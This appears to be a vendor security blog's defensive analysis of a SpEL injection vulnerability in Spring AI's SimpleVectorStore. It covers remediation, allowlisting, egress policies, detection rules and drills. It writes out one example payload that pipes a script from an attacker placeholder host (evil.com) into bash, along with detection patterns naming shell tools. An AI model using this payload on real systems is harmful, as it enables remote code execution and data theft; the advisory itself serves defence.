CVE-2026-22738: Spring AI SpEL Injection in SimpleVectorStore - REFLEX Analysis

cve-analysis · Published March 30, 2026

CVE Overview

  • CVE ID: CVE-2026-22738
  • Component/Software: Spring AI — SimpleVectorStore
  • 🚨 Vulnerable Versions: 1.0.0 through 1.0.4 and 1.1.0 through 1.1.3
  • Severity: 9.8 CRITICAL (CVSS 3.1)
  • Impact: Remote code execution via SpEL injection in filter expression keys
  • Date: March 27, 2026
  • ✅ Safe Version: Upgrade to Spring AI 1.0.5 or later (1.0.x line) or 1.1.4 or later (1.1.x line)

Important: HeroDevs Never-Ending Support (NES)

Organizations running legacy applications that cannot easily upgrade can leverage HeroDevs Never-Ending Support for continued security patches and guidance on legacy Spring AI versions. HeroDevs provides full NES coverage for Spring AI 1.0 and 1.1 as part of their Spring Boot 3.5 portfolio — critical for teams facing the June 2026 end-of-life deadline.

The AI vulnerability nobody saw coming. While the industry focused on prompt injection and model poisoning, this CVE proved that classical injection attacks are alive and well in the AI ecosystem — hiding inside the vector store that powers your RAG pipeline.

An attacker named “Kael” has been watching Spring AI’s growing adoption among enterprise teams building retrieval-augmented generation systems. When CVE-2026-22738 drops on March 27th, he’s ready. He scans GitHub for Spring AI applications that expose search endpoints — and finds a healthcare startup’s patient knowledge base built on SimpleVectorStore. Kael crafts a search request with a malicious filter key containing a SpEL expression: instead of filtering documents, the expression executes arbitrary code inside the JVM. Within seconds, Kael has a reverse shell on the production server, with full access to patient records and cloud credentials stored in environment variables.


REFLEX Analysis

🔍 Reconnaissance

From an attacker’s perspective:

Attackers hunting for CVE-2026-22738 have a surprisingly easy time identifying targets. Spring AI is still young enough that most applications using it are greenfield projects built in the last 12–18 months, and their developers tend to be enthusiastic about sharing their work. Conference talks, blog posts, and GitHub repositories describing “building RAG with Spring AI” provide a roadmap to targets.

The first signal is dependency discovery. Public pom.xml or build.gradle files on GitHub containing spring-ai-core or spring-ai-starter immediately flag an application as potentially vulnerable. Attackers can refine this by searching for SimpleVectorStore specifically — the vulnerable component — since many teams use it for prototyping before moving to a production vector database like Pgvector or Milvus. What makes this dangerous is that “prototype” code has a habit of reaching production.

Beyond source code, attackers can fingerprint Spring AI applications through their behaviour. Endpoints that accept filter parameters alongside semantic search queries — common patterns like /api/search?query=...&filter=... — suggest a vector store with filtering enabled. Error messages from failed SpEL parsing can confirm the technology stack and reveal version information.

Supply chain mapping is also productive. Spring AI’s transitive dependency graph pulls in Spring Boot, Spring Expression Language, and the AI model client libraries. Teams focused on getting their RAG pipeline working may never audit the filter expression handling path — it’s a utility feature they configured once and forgot about.

Developer insight: The features you configure once and forget about are exactly the features attackers study most carefully.

📊 Evaluate

Vulnerability assessment:

CVE-2026-22738 is exploitable when three conditions align: the application uses SimpleVectorStore (not an external vector database), user-controllable input reaches a filter expression key, and the application runs a vulnerable version (1.0.0–1.0.4 or 1.1.0–1.1.3). The critical word is “key” — not the filter value, but the field name itself.

The technical root cause is a classic injection flaw adapted for a modern context. SimpleVectorStore evaluates filter expressions using Spring Expression Language (SpEL) to match documents against criteria. When building these expressions, the filter key — the field name being filtered on — is interpolated directly into a SpEL expression string without sanitization. An attacker who controls the key can break out of the intended expression and inject arbitrary SpEL code.

Here’s the vulnerable pattern:

// VULNERABLE — user input used directly as filter key
@GetMapping("/search")
public List<Document> search(
    @RequestParam String query,
    @RequestParam String filterField,  // attacker controls this
    @RequestParam String filterValue) {

    FilterExpression filter = new FilterExpression(
        FilterExpression.ExpressionType.EQ,
        new FilterExpression.Key(filterField),   // SpEL injection point
        new FilterExpression.Value(filterValue)
    );

    return vectorStore.similaritySearch(
        SearchRequest.query(query).withFilterExpression(filter)
    );
}

An attacker can submit a filterField like T(java.lang.Runtime).getRuntime().exec('curl http://evil.com/shell.sh|bash') — and instead of filtering documents, the server executes arbitrary system commands.
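To make the break-out concrete, here is a minimal, self-contained sketch of the flawed pattern — a filter key concatenated into a SpEL expression string with no escaping. The `buildSpelFilter` helper and the `metadata['…']` expression shape are illustrative assumptions for this sketch, not SimpleVectorStore's actual internals:

```java
public class SpelKeyInjectionDemo {

    // Hypothetical helper: interpolates the filter key and value straight
    // into a SpEL expression string without escaping (illustrative only).
    static String buildSpelFilter(String key, String value) {
        return "metadata['" + key + "'] == '" + value + "'";
    }

    public static void main(String[] args) {
        // Benign input produces the intended expression.
        System.out.println(buildSpelFilter("category", "health"));
        // metadata['category'] == 'health'

        // A malicious "key" closes the quote and bracket, then injects SpEL.
        String evilKey =
            "x'] == '' or T(java.lang.Runtime).getRuntime() != null or metadata['x";
        System.out.println(buildSpelFilter(evilKey, "ignored"));
        // The injected T(...) type reference executes once the resulting
        // string is evaluated in a standard SpEL evaluation context.
    }
}
```

The key point: because the attacker controls text inside the expression itself, no amount of value-side validation helps — the break-out happens before the expression is ever evaluated.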

Assessment is complicated by how Spring AI is typically adopted. It’s a framework for building AI-powered features, not a standalone application. This means the vulnerability lives inside custom code that varies per project. Automated scanners can flag the vulnerable library version, but confirming exploitability requires understanding how each application passes user input to the vector store’s filter API.

Developer insight: Injection vulnerabilities don’t retire — they just find new frameworks to hide in. If you’re interpolating user input into any expression language, you have an injection risk.

🛡️ Fortify

Prevention and hardening:

Upgrade immediately. Update to Spring AI 1.0.5 (for the 1.0.x line) or Spring AI 1.1.4 (for the 1.1.x line). The fix adds proper escaping and validation of filter expression keys before SpEL evaluation. This is the only complete remediation.
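The upgrade can be enforced centrally rather than per module. A sketch of a Maven `dependencyManagement` entry importing the Spring AI BOM at the patched version — verify the `spring-ai-bom` coordinates against the Spring AI release notes for your build:

```xml
<dependencyManagement>
  <dependencies>
    <!-- Pin the whole Spring AI dependency tree to the patched release -->
    <dependency>
      <groupId>org.springframework.ai</groupId>
      <artifactId>spring-ai-bom</artifactId>
      <version>1.0.5</version>
      <type>pom</type>
      <scope>import</scope>
    </dependency>
  </dependencies>
</dependencyManagement>
```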

If you cannot upgrade immediately, apply these mitigations in order of effectiveness:

  1. Allowlist filter keys: Never accept arbitrary user input as a filter field name. Map user input to a fixed set of permitted fields:
// SECURE — allowlisted filter keys
private static final Set<String> ALLOWED_FILTER_KEYS =
    Set.of("category", "author", "date", "status", "department");

@GetMapping("/search")
public List<Document> search(
    @RequestParam String query,
    @RequestParam String filterField,
    @RequestParam String filterValue) {

    // BAD: using filterField directly
    // GOOD: validate against allowlist
    if (!ALLOWED_FILTER_KEYS.contains(filterField)) {
        throw new IllegalArgumentException(
            "Invalid filter field: " + filterField);
    }

    FilterExpression filter = new FilterExpression(
        FilterExpression.ExpressionType.EQ,
        new FilterExpression.Key(filterField),
        new FilterExpression.Value(filterValue)
    );

    return vectorStore.similaritySearch(
        SearchRequest.query(query).withFilterExpression(filter)
    );
}
  2. Remove user-facing filter parameters: If your application doesn’t need user-controlled filter fields, don’t expose them. Hardcode the filter keys in your backend and only accept values from the frontend.

  3. Deploy a WAF rule: Add a web application firewall rule to detect SpEL injection patterns in request parameters. Look for T(, Runtime, exec(, and ProcessBuilder in query strings and request bodies.

  4. Restrict JVM permissions: Run your application under a container security context (or, on older JDKs, a Java Security Manager — deprecated since JDK 17) that limits what Runtime.exec() and reflection can do, reducing the impact even if injection occurs.
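The SpEL markers from the WAF guidance above can also be enforced in application code as a cheap pre-validation step. A sketch — the pattern list is a starting point, not an exhaustive SpEL signature set, and it is defence in depth, never a substitute for the allowlist:

```java
import java.util.regex.Pattern;

public class SpelMarkerCheck {

    // Common SpEL injection markers; extend for your own traffic.
    private static final Pattern SPEL_MARKERS = Pattern.compile(
        "T\\s*\\(|getRuntime|ProcessBuilder|exec\\s*\\(|\\.class\\.",
        Pattern.CASE_INSENSITIVE);

    // Returns true when the input contains a known SpEL injection marker.
    public static boolean looksLikeSpelInjection(String input) {
        return input != null && SPEL_MARKERS.matcher(input).find();
    }

    public static void main(String[] args) {
        System.out.println(looksLikeSpelInjection("category"));            // false
        System.out.println(looksLikeSpelInjection(
            "T(java.lang.Runtime).getRuntime().exec('id')"));              // true
    }
}
```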

Long-term fortification: Pin your Spring AI version in pom.xml or build.gradle to the patched version. Enable Dependabot or Renovate to alert on future Spring AI security updates. Add a security scanning step in CI/CD that fails the build on critical CVEs.

Developer insight: An allowlist of permitted field names is three lines of code. A breach response is three months of work. The maths is not complicated.

⚡ Limit

Damage containment:

Even with the best patching cadence, assume that exploitation could happen before you upgrade. The question is: how much damage can an attacker do once they have code execution inside your JVM?

Network segmentation is the single most effective containment measure. If your Spring AI application can only reach its configured AI model API and database — with all other outbound traffic blocked — an attacker who achieves code execution cannot easily exfiltrate data or establish a reverse shell. This alone would have stopped the scenario described above.

# Kubernetes NetworkPolicy — restrict egress from the AI service
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: spring-ai-service-egress
spec:
  podSelector:
    matchLabels:
      app: ai-search-service
  policyTypes:
    - Egress
  egress:
    - to:
        - podSelector:
            matchLabels:
              app: postgres-vectorstore
      ports:
        - protocol: TCP
          port: 5432
    - to:
        - ipBlock:
            cidr: 0.0.0.0/0
      ports:
        - protocol: TCP
          port: 443  # AI model API only — consider IP-restricting further
    # No unrestricted outbound access

Least privilege compounds the benefit. The service account running your Spring AI application should have read-only access to the vector store and no access to secrets, credential stores, or other services beyond what it strictly needs. In AWS, use IAM roles scoped to the specific resources the application needs. In Kubernetes, use ServiceAccounts with minimal RBAC bindings.

Container isolation adds another layer. Run the application in a non-root container with a read-only root filesystem. If an attacker achieves code execution but can’t write to disk or escalate privileges, their options narrow considerably.
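The non-root, read-only guidance above maps directly onto a Kubernetes securityContext. A sketch of the relevant pod-spec fragment (field names follow the standard Pod securityContext API; the service name matches the NetworkPolicy example above):

```yaml
# Pod-level hardening for the AI search service
securityContext:
  runAsNonRoot: true
  runAsUser: 10001
containers:
  - name: ai-search-service
    securityContext:
      readOnlyRootFilesystem: true
      allowPrivilegeEscalation: false
      capabilities:
        drop: ["ALL"]
```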

Micro-service boundaries matter too. If your vector search is a separate service from your core application, a compromise is contained to that service. The attacker doesn’t automatically get access to your user database, payment systems, or admin interfaces.

Developer insight: Code execution is the beginning of an attack, not the end. Every architectural boundary between the compromised service and your crown jewels is time you’ve bought for your incident response team.

👁️ Expose

Detection and visibility:

SpEL injection attempts leave distinctive traces if you know where to look. The attack payload contains Java class references and method calls that look nothing like legitimate filter field names.

HTTP request monitoring is your first line of detection. Legitimate filter keys are short, alphanumeric strings like category or author. Attack payloads contain patterns like T(java.lang, Runtime, getRuntime(), exec(, and ProcessBuilder. Set up WAF or application-level rules to flag these:

# Detect SpEL injection attempts in application access logs
grep -E "(T\(java|getRuntime|ProcessBuilder|exec\(|\.class\.)" /var/log/app/access.log

# Real-time monitoring with tcpdump for network-level detection
tcpdump -A -i any 'port 8080' | grep -E 'T%28java|getRuntime|exec%28'

Application-level logging should capture filter expressions before they’re evaluated. Add structured logging around your vector store search calls:

// SLF4J parameterized logging — each value needs a matching {} placeholder
logger.info("Vector search request userId={} query={} filterKey={} sourceIp={}",
    authenticatedUser.getId(),
    query.substring(0, Math.min(query.length(), 100)),
    filterField,
    request.getRemoteAddr());

Runtime behavioural monitoring catches successful exploitation. Tools like Falco or Tetragon can detect when a Java process spawns unexpected child processes (shell commands), makes unusual network connections, or reads sensitive files:

# Falco rule — detect shell execution from Java process
- rule: Shell spawned by Java
  desc: Detect shell spawned from a Java/Spring application
  condition: >
    spawned_process and
    proc.pname = "java" and
    proc.name in (bash, sh, curl, wget, nc, python)
  output: >
    Shell spawned from Java process
    (user=%user.name command=%proc.cmdline parent=%proc.pname
     container=%container.name image=%container.image.repository)
  priority: CRITICAL

Post-exploitation indicators to monitor: unexpected outbound DNS queries (especially base64-encoded subdomains used for data exfiltration), new network connections to IP addresses not in your allowlist, and sudden spikes in CPU or memory usage from the application process.

Developer insight: You can’t detect what you don’t log. Structured logging around your AI pipeline’s input processing is cheap insurance against a class of attacks that will only grow as AI frameworks mature.

💪 Exercise

Practice and preparedness:

Dependency audit drill: Can your team identify every application using Spring AI in under 10 minutes? Run this now:

# Find all projects using Spring AI in your organisation's repos
# Maven projects
find /path/to/repos -name "pom.xml" -exec grep -l "spring-ai" {} \;

# Gradle projects
find /path/to/repos -name "build.gradle*" -exec grep -l "spring-ai" {} \;

# Check specific version
mvn dependency:tree -Dincludes=org.springframework.ai

Code review exercise: Search your codebases for the vulnerable pattern — user input reaching filter expression keys. This is a focused, time-boxed exercise that builds familiarity with the attack surface:

# Find potential SpEL injection points
grep -rn "FilterExpression\|withFilterExpression\|similaritySearch" \
  --include="*.java" /path/to/project

Team preparedness checklist:

  • Can you generate a complete dependency tree for all Spring AI applications in under 5 minutes?
  • Do your CI/CD pipelines fail on critical CVEs before code reaches production?
  • Is there an allowlist of permitted filter keys in every endpoint that accepts filter parameters?
  • Can you deploy a patched version of your AI search service within 4 hours of a CVE disclosure?
  • Do you have egress network policies restricting outbound connections from your AI services?
  • Are filter expression inputs logged with enough context for forensic analysis?
  • Has your team practiced an incident response scenario specific to code execution in an AI service?

Tabletop scenarios:

  • Zero-day in your vector store: Spring AI discloses a new critical CVE on a Friday afternoon. Your team has to assess exposure, apply mitigations, and communicate with stakeholders. Walk through: who does what, in what order, and how long does each step take?
  • Supply chain escalation: An attacker compromises your Spring AI application and uses it as a beachhead to reach your model API keys. How far can they get before your monitoring detects it? What secrets are accessible from that service?
  • Regulatory pressure: A regulator asks you to demonstrate that your AI-powered search system is protected against injection attacks. What evidence can you produce, and how quickly?

Developer insight: The AI security landscape is moving fast, but injection attacks are as old as web applications. The teams that practise responding to classical vulnerabilities in their AI stack will be the ones that survive the novel attacks too.


Key Takeaways for Developers

Most important lesson: “AI frameworks inherit every vulnerability class that traditional frameworks have — plus new ones. SpEL injection in a vector store is just SQL injection wearing a different hat.”

🚨 CRITICAL: Upgrade to Spring AI 1.0.5+ or 1.1.4+ immediately — this is the only complete fix for CVE-2026-22738.

Immediate actions:

  1. 🚨 UPGRADE NOW: Update to Spring AI 1.0.5 (1.0.x line) or 1.1.4 (1.1.x line) across all applications
  2. Audit filter usage: Search every codebase for FilterExpression, withFilterExpression, and similaritySearch — identify where user input reaches filter keys
  3. Implement allowlists: Add input validation that restricts filter field names to a fixed set of permitted values
  4. Add WAF rules: Deploy web application firewall rules to detect SpEL injection patterns such as T(java, getRuntime, and exec( in request parameters
  5. Restrict network egress: Apply Kubernetes NetworkPolicies or security group rules to limit outbound traffic from AI services
  6. Enable dependency scanning: Add Dependabot, Snyk, or OWASP Dependency-Check to your CI/CD pipeline if not already present

Long-term practices:

  • Treat AI frameworks like any other attack surface: Apply the same security review rigour to your RAG pipeline as you would to your authentication system
  • Pin and audit AI dependencies: Spring AI is evolving rapidly — pinned versions and automated security scanning prevent surprise vulnerabilities
  • Isolate AI services architecturally: Run vector search behind network policies with minimal privileges and no direct access to sensitive data stores
  • Log AI pipeline inputs structurally: Every query and filter parameter should be logged with user context for forensic analysis

Related patterns: This vulnerability demonstrates classic Java and Maven/Gradle dependency risks, LLM tooling misuse concerns, and prompt injection patterns covered in our battlecards.

